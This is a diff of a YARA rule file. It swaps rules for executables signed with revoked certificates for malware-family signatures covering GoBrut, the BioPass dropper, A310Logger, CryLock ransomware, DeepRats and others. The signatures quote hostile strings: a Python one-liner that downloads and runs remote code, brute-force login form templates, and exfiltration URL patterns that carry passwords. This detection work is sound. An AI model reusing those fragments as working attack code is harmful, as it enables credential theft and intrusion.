-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRASS RAIN, s.r.o." and pe.signatures [ i ] . serial == "77:55:0e:d6:97:99:2b:39:7e:3f:1a:d8:e2:a6:62:d1" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_B1Bbef3Aba79Ab2Eae5B8015F26B34F8 : FILE
+rule DITEKSHEN_MALWARE_Win_Iamtheking : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing payload"
 		author = "ditekSHen"
-		id = "382952bd-ffb3-5ff7-aff1-cf9fe8f20d1d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8506-L8519"
+		id = "cf0d7c8d-0ac3-542d-b42e-f215af36044b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7009-L7029"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34b00243f0b5e8d09938f1500871797125644f839298427c877801027638fd34"
+		logic_hash = "1cc2aa9b672b8519a3e8a22e31403fb7adace0d430f9cab160e9a7d52e56e875"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "247a10fc20386f4f54b7451aecc2d97ec77567c5031028cc7f1b98f9191bee80"
-		reason = "NW0rm"
-		importance = 20
+
+	strings:
+		$s1 = "DeleteFile \"%s\" Failed,Err=%d" wide
+		$s2 = "DeleteFile \"%s\" Success" wide
+		$s3 = "ExcuteFile \"%s\" Failed,Err=%d" wide
+		$s4 = "ExcuteFile \"%s\" Success" wide
+		$s5 = "CreateDownLoadFile \"%s\" Failed,Error=%d" wide
+		$s6 = "uploadFile \"%s\" Failed,errorcode=%d" wide
+		$s7 = "CreateUpLoadFile \"%s\" Success" wide
+		$s8 = "im the king" ascii
+		$s9 = "dont disturb me" fullword ascii
+		$s10 = "kill me or love me" fullword ascii
+		$s11 = "please leave me alone" fullword ascii
+		$s12 = "calculate the NO." fullword ascii
+		$s13 = "\\1-driver-vmsrvc" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIDZHITAL ART, OOO" and pe.signatures [ i ] . serial == "b1:bb:ef:3a:ba:79:ab:2e:ae:5b:80:15:f2:6b:34:f8" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_05D50A0E09Bb9A836Ffb90A3 : FILE
+rule DITEKSHEN_MALWARE_Win_Gobrut : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown Go multi-bruteforcer bot (StealthWorker / GoBrut) against multiple systems: QNAP, MagOcart, WordPress, Opencart, Bitrix, Postgers, MySQL, Drupal, Joomla, SSH, FTP, Magneto, CPanel"
 		author = "ditekSHen"
-		id = "f6947bf1-7f20-5be5-a242-c1025be40055"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8521-L8534"
+		id = "f5605123-12d9-55d1-8a32-acebf16834f8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7031-L7086"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc38ae0c9d4fc26739deab65ae3669f272e999b76dbc521dae04b9a3e3e7cef0"
+		logic_hash = "fb93d0dcf7f38294444ac6d2e1a7a126027ce07f0305af9ae0f8aa8f4b806c5c"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "2d072e0e80885a82d5e35806b052ca416994e0fe06da1cfdcebd509d967a1aae"
-		reason = "ParallaxRAT"
-		importance = 20
+
+	strings:
+		$x1 = "/src/StealthWorker/Worker" ascii
+		$x2 = "/go/src/Cloud_Checker/" ascii
+		$x3 = "brutXmlRpc" ascii
+		$s1 = "main.WPBrut" ascii
+		$s2 = "main.WPChecker" ascii
+		$s3 = "main.WooChecker" ascii
+		$s4 = "main.StandartBrut" ascii
+		$s5 = "main.StandartBackup" ascii
+		$s6 = "main.WpMagOcartType" ascii
+		$s7 = "main.StandartAdminFinder" ascii
+		$w1 = "/WorkerQnap_brut/main.go" ascii
+		$w2 = "/WorkerHtpasswd_brut/main.go" ascii
+		$w3 = "/WorkerOpencart_brut/main.go" ascii
+		$w4 = "/WorkerBitrix_brut/main.go" ascii
+		$w5 = "/WorkerPostgres_brut/main.go" ascii
+		$w6 = "/WorkerMysql_brut/main.go" ascii
+		$w7 = "/WorkerFTP_brut/main.go" ascii
+		$w8 = "/WorkerSSH_brut/main.go" ascii
+		$w9 = "/WorkerDrupal_brut/main.go" ascii
+		$w10 = "/WorkerJoomla_brut/main.go" ascii
+		$w11 = "/WorkerMagento_brut/main.go" ascii
+		$w12 = "/WorkerWHM_brut/main.go" ascii
+		$w13 = "/WorkerCpanel_brut/main.go" ascii
+		$w14 = "/WorkerPMA_brut/main.go" ascii
+		$w15 = "/WorkerWP_brut/main.go" ascii
+		$p1 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=cpanel" ascii
+		$p2 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=ftpBrut" ascii
+		$p3 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=mysql_b" ascii
+		$p4 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=qnapBrt" ascii
+		$p5 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=OCartBrt" ascii
+		$p6 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=phpadmin" ascii
+		$p7 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=bitrixBrt" ascii
+		$p8 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=drupalBrt" ascii
+		$p9 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=joomlaBrt" ascii
+		$p10 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=htpasswdBrt" ascii
+		$p11 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=magentoBrt" ascii
+		$p12 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=postgres_b" ascii
+		$p13 = "AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=%s&USER_PASSWORD=%s&Login=&captcha_sid=&captcha_word=" ascii
+		$p14 = "%qlog=%s&pwd=%s&wp-submit=Log In&redirect_to=%s/wp-admin/&testcookie=1" ascii
+		$p15 = "name=%s&pass=%s&form_build_id=%s&form_id=user_login_form&op=Log" ascii
+		$p16 = "username=%s&passwd=%s&option=com_login&task=login&return=%s&%s=1" ascii
+		$v1_1 = "brutC" fullword ascii
+		$v1_2 = "XmlRpc" fullword ascii
+		$v1_3 = "shouldRetry$" ascii
+		$v1_4 = "HttpC|%" ascii
+		$v1_5 = "ftpH%_" ascii
+		$v1_6 = "ssh%po" ascii
+		$v1_7 = "?sevlyar/4-da" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 2 of ( $x* ) and 3 of ( $s* ) ) or all of ( $s* ) or 6 of ( $w* ) or 6 of ( $p* ) or 6 of ( $v1* ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_623Eae6A66D3A6Ee80Df9Ccebe51181E : FILE
+rule DITEKSHEN_MALWARE_Win_Biopass_Dropper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Go BioPass dropper"
 		author = "ditekSHen"
-		id = "7c3b85e4-8ce7-5c48-8f3b-e237a5cae9a0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8536-L8549"
+		id = "56037c79-59f7-587c-8f54-c9618e871f34"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7088-L7111"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "79fceab5a19025d25abb12a8e6f57f8a930d348d538d9c556b6d4fc461af66f2"
+		logic_hash = "06f3b3ee38349ddcf9be7cbb7627d60fa673962409dde6e4badd112841a3ed19"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "21c4e9af43068d041e6aec84341ae89cabb9917792c4bc372eced059555bb845"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$go = "Go build ID:" ascii
+		$s1 = "main.NetWorkStatus" ascii
+		$s2 = "main.NoErrorRunFunction" ascii
+		$s3 = "main.FileExist" ascii
+		$s4 = "main.execute" ascii
+		$s5 = "main.PsGenerator" ascii
+		$s6 = "main.downFile" ascii
+		$s7 = "main.Unzip" ascii
+		$url1 = "https://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/" ascii
+		$x1 = "SCHTASKS /Run /TN SYSTEM_CDAEMON" ascii
+		$x2 = "SCHTASKS /Run /TN SYSTEM_SETTINGS" ascii
+		$x3 = "SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST" ascii
+		$x4 = ".exe /install /quiet /norestart" ascii
+		$x5 = "exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\\''http" ascii
+		$x6 = "powershell.exe -Command $" ascii
+		$x7 = ".Path ='-----BEGIN RSA TESTING KEY-----" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAIN AI LTD" and pe.signatures [ i ] . serial == "62:3e:ae:6a:66:d3:a6:ee:80:df:9c:ce:be:51:18:1e" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $x* ) or ( 1 of ( $url* ) and ( $go ) ) or 9 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A392F03Ded5D73Cdeeda75052A57176 : FILE
+rule DITEKSHEN_MALWARE_Win_A310Logger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects A310Logger"
 		author = "ditekSHen"
-		id = "c0a8cc1c-7427-589b-9e32-8679e9cdf251"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8551-L8564"
+		id = "d2cf2f7b-5710-56ab-b13d-97a70fe7f618"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7113-L7149"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea0159ec1c4670c1e961a87131998fa796cf205eaa8a06bf829c61c9694fa5ef"
+		logic_hash = "8205169c9c78eb784b9d07a5fd85ad3a54763452e1e315f7e7911b8ac49a6c01"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "cf1d95b39cc695e90dc2ca8b1b50f33b71f9f21091df2b72ed97f0759b5ddde4"
-		reason = "Quakbot"
-		importance = 20
+		snort_sid = "920204-920207"
+
+	strings:
+		$s1 = "Temporary Directory * for" fullword wide
+		$s2 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
+		$s3 = "@ENTIFIER=" wide
+		$s4 = "ExecQuery" fullword wide
+		$s5 = "MSXML2.ServerXMLHTTP.6.0" fullword wide
+		$s6 = "Content-Disposition: form-data; name=\"document\"; filename=\"" wide
+		$s7 = "CopyHere" fullword wide
+		$s8 = "] Error in" fullword wide
+		$s9 = "shell.application" fullword wide nocase
+		$s10 = "SetRequestHeader" fullword wide
+		$s11 = "\\Ethereum\\keystore" fullword wide
+		$s12 = "@TITLE Removing" fullword wide
+		$s13 = "@RD /S /Q \"" fullword wide
+		$en1 = "Unsupported encryption" fullword wide
+		$en2 = "BCryptOpenAlgorithmProvider(SHA1)" fullword wide
+		$en3 = "BCryptGetProperty(ObjectLength)" fullword wide
+		$en4 = "BCryptGetProperty(HashDigestLength)" fullword wide
+		$v1_1 = "PW\\FILES\\SC::" wide
+		$v1_2 = "AddAttachment" fullword wide
+		$v1_3 = "Started:" fullword wide
+		$v1_4 = "Ended:" fullword wide
+		$v1_5 = "sharedSecret" fullword wide
+		$v1_6 = "\":\"([^\"]+)\"" fullword wide
+		$v1_7 = "\\credentials.txt" fullword wide
+		$v1_8 = "WritePasswords" fullword ascii
+		$v1_9 = "sGeckoBrowserPaths" fullword ascii
+		$v1_10 = "get_sPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER COMPUTERS LTD" and pe.signatures [ i ] . serial == "0a:39:2f:03:de:d5:d7:3c:de:ed:a7:50:52:a5:71:76" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $en* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $en* ) ) or 5 of ( $v1* ) or ( 4 of ( $v1* ) and 2 of ( $s* ) and 2 of ( $en* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : FILE
+rule DITEKSHEN_MALWARE_Win_Crylock : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CryLock ransomware"
 		author = "ditekSHen"
-		id = "59e63c76-1051-5274-b886-fcd75c8b0b38"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8566-L8579"
+		id = "296288d8-2fdd-592a-aef9-7d4853885594"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7151-L7186"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62b9ea3c5197635db2101972af951f4afbd9b311b3c8286525bbd5b5baa17c41"
+		logic_hash = "dde35dd2c7e89212c4562f2dcf6a78d06fbb3d31150d49e6c48f758b07f1834f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "0767b9ab857b8e24282b80a7368323689a842e6c8b5a00a4f965c03e375e8b0d"
-		reason = "Hive"
-		importance = 20
+
+	strings:
+		$s1 = "Encrypted by BlackRabbit. (BR-" ascii
+		$s2 = "{ENCRYPTENDED}" ascii
+		$s3 = "{ENCRYPTSTART}" ascii
+		$s4 = "<%UNDECRYPT_DATETIME%>" ascii
+		$s5 = "<%RESERVE_CONTACT%>" ascii
+		$s6 = "how_to_decrypt.hta" ascii wide
+		$s7 = "END ENCRYPT ONLY EXTENATIONS" ascii
+		$s8 = "END UNENCRYPT EXTENATIONS" ascii
+		$s9 = "END COMMANDS LIST" ascii
+		$s10 = "END PROCESSES KILL LIST" ascii
+		$s11 = "END SERVICES STOP LIST" ascii
+		$s12 = "END PROCESSES WHITE LIST" ascii
+		$s13 = "END UNENCRYPT FILES LIST" ascii
+		$s14 = "END UNENCRYPT FOLDERS LIST" ascii
+		$s15 = "Encrypted files:" ascii
+		$s16 = { 65 78 74 65 6e 61 74 69 6f 6e 73 00 ff ff ff ff
+                 06 00 00 00 63 6f 6e 66 69 67 00 00 ff ff ff ff
+                 (0a|0d 0a) 00 00 00 63 6f 6e 66 69 67 2e 74 78
+                 74 00 00 ff ff ff ff 03 00 00 00 68 74 61 }
+		$p1 = "-exclude" fullword
+		$p2 = "-makeff" fullword
+		$p3 = "-full" fullword
+		$p4 = "-nolocal" fullword
+		$p5 = "-nolan" fullword
+		$p6 = "\" -id \"" fullword
+		$p7 = "\" -wid \"" fullword
+		$p8 = "\"runas\"" fullword
+		$p9 = " -f -s -t 00" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 6 of ( $p* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Da156922F4760E0C5F5Bcf79812A27E1 : FILE
+rule DITEKSHEN_MALWARE_Win_Deeprats : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DeepRats ("
 		author = "ditekSHen"
-		id = "065bacbc-3004-53c1-ba73-4779743e8221"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8581-L8594"
+		id = "5b774e24-3864-519f-9cfd-d729d7d567a0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7188-L7218"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6dd0f2373e412a753cbe5e27152f48d6c8980de9b26e5ab212b926e7e41c813"
+		logic_hash = "511264c0b6932f90069a5206cd142ca7210b0bc40c51ef5aa9c41a161fb57aab"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "6e19e012f55e0bb44e9036d4445ab945942965dcb81b9ed24ad6fc17933c4fce"
-		reason = "Quakbot"
-		importance = 20
+		hash1 = "1f8b7e1b14869d119c5de1f05330094899bd997fca4c322d852db85cbd9271e6"
+
+	strings:
+		$s1 = "https://freegeoip.live/json/https://myexternalip.com/rawin" ascii
+		$s2 = "github.com/cretz/bine" ascii
+		$s3 = "github.com/kbinani/screenshot" ascii
+		$s4 = "socks5://%s:%d" ascii
+		$s5 = "socks5://%s:%s@%s:%d" ascii
+		$s6 = "http://%s:%d" ascii
+		$s7 = "http://%s@%s:%d" ascii
+		$s8 = "%SystemRoot%\\system32\\--CookieAuthentication" ascii
+		$s9 = "tor_addr_" ascii
+		$f1 = ".GetVnc" ascii
+		$f2 = ".GetCommand" ascii
+		$f3 = ".GetPayload" ascii
+		$f4 = ".ListenCommands" ascii
+		$f5 = ".ReceiveFile" ascii
+		$f6 = ".RegisterImplant" ascii
+		$f7 = ".Screenshot" ascii
+		$f8 = ".SendFile" ascii
+		$f9 = ".StartShell" ascii
+		$f10 = ".UnregisterImplant" ascii
+		$f11 = ".VncInstalled" ascii
+		$f12 = ".PingPong" ascii
+		$f13 = ".ListenCMD" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRINK AND BUBBLE LTD" and pe.signatures [ i ] . serial == "da:15:69:22:f4:76:0e:0c:5f:5b:cf:79:81:2a:27:e1" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 8 of ( $f* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : FILE
+rule DITEKSHEN_MALWARE_Win_Gasket : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "37d1061f-80b1-5944-bde3-6279633e321a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8596-L8609"
+		description = "Detects Gasket"
+		author = "ditekSHen"
+		id = "3afa131d-9c88-50df-a3b4-552db4a84e69"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7220-L7250"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8fa1dad2cd4c1406c1346bbe0fef88eba415437d159cf9010dcfaaa7210aef0e"
+		logic_hash = "0279979915891fc8c813ba555120ee5705b53b234a808b5ca77bff35a082e376"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "92f005b9c46c7993205d9451823cf0410d1afbd7056a7dcdfa2b8b3da74ee1bf"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "main.checkGasket" ascii
+		$s2 = "main.connectGasket" ascii
+		$s3 = "/cert/trust/dev/stderr/dev/stdout/index.html" ascii
+		$f1 = ".SetPingHandler." ascii
+		$f2 = ".SetPongHandler." ascii
+		$f3 = ".computeMergeInfo." ascii
+		$f4 = ".computeDiscardInfo." ascii
+		$f5 = ".readPlatformMachineID." ascii
+		$f6 = ".(*Session).establishStream." ascii
+		$f7 = ".(*Session).handleGoAway." ascii
+		$f8 = ".(*Stream).processFlags." ascii
+		$f9 = ".(*Session).handlePing." ascii
+		$f10 = ".(*windowsService).Install." ascii
+		$f11 = ".(*windowsService).Uninstall." ascii
+		$f12 = ".(*windowsService).Status." ascii
+		$f13 = ".getStopTimeout." ascii
+		$f14 = ".DialContext." ascii
+		$f15 = ".WriteControl." ascii
+		$f16 = ".(*Server).authenticate." ascii
+		$f17 = ".(*Server).ServeConn." ascii
+		$f18 = ".(*TCPProxy).listen." ascii
+		$f19 = ".UserPassAuthenticator.Authenticate." ascii
+		$f20 = ".(*InfoPacket).XXX_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 16 of ( $f* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_121070Be1E782F206985543Bc7Bc58B6 : FILE
+rule DITEKSHEN_MALWARE_Win_Silentmoon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SilentMoon"
 		author = "ditekSHen"
-		id = "8432c7f0-ee2e-5935-8fe8-36b0094a5e1a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8611-L8624"
+		id = "0b41a07b-0e2a-5bbf-8789-3b46460d2c09"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7252-L7272"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "21eb6fed2225d2ab056948603b0990c2eb7dc9289da9a9df16f0d6cd042b3778"
+		logic_hash = "1aa61e83d0003ef41d16fd40698485fdf41a957639ac3c3f2770994a43bd502a"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "a4534aff03258589a2622398d1904d3bfd264c37e8649a68136f8d552f8b738f"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\Global\\PIPE\\" fullword wide
+		$s2 = "REMOTE_NS:ERROR:%d" fullword ascii
+		$s3 = "REMOTE:ERROR:%d" fullword ascii
+		$s4 = "COMNAP,COMNODE,SQLQUERY,SPOOLSS,LLSRPC,browser" fullword wide
+		$s5 = "Mem alloc err" fullword ascii
+		$s6 = "block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d" ascii
+		$x1 = "ACTION:UNSUPPORTED" fullword ascii
+		$x2 = "?ServiceMain@@YAXKPAPA_W@Z" fullword ascii
+		$x3 = "?ServiceCtrlHandler@@YGKKKPAX0@Z" fullword ascii
+		$x4 = "%d socks, %d sorted, %d scanned" ascii
+		$x5 = "GoldenSky" fullword wide
+		$x6 = "SilentMoon" fullword wide
+		$x7 = "internalstoragerpc" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 3 of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_15C21Dab7F4E644E4B35C4858004D8A9 : FILE
+rule DITEKSHEN_MALWARE_Win_Lu0Bot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Lu0Bot"
 		author = "ditekSHen"
-		id = "7dac5657-038f-5cbd-a854-cdb12921121e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8626-L8639"
+		id = "f8595553-b911-5e30-9ece-cad7d5913f19"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7274-L7285"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "646a858b10de89da4e639d3902ada78fad3a45868f0d7782546a865396cf226c"
+		logic_hash = "b4822248230a804b1dc75f8d517af28a621dab1746c9ef45eaa4754149ce0cba"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "34a9cd401a5a86c5194954df3a497094c01b6603264aab5cf7d9b3c4a0074801"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "WinExec" fullword ascii
+		$s2 = "AlignRects" fullword ascii
+		$o1 = { be 00 20 40 00 89 f7 89 f0 81 c7 a? 01 00 00 81 }
+		$o2 = { 53 50 e8 b0 01 00 00 e9 99 01 00 00 e8 ae 01 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P.REGO, s.r.o." and pe.signatures [ i ] . serial == "15:c2:1d:ab:7f:4e:64:4e:4b:35:c4:85:80:04:d8:a9" )
+		uint16( 0 ) == 0x5a4d and filesize < 4KB and 1 of ( $s* ) and all of ( $o* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_101D6A5A29D9A77807553Ceac669D853 : FILE
+rule DITEKSHEN_MALWARE_Win_Shellcodedlei : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects shellcode downloader, executer, injector"
 		author = "ditekSHen"
-		id = "8554ce79-fd87-54ac-b538-e2899fe95414"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8641-L8654"
+		id = "62a4f141-87f8-596a-adf6-5bf9a50c9e91"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7287-L7304"
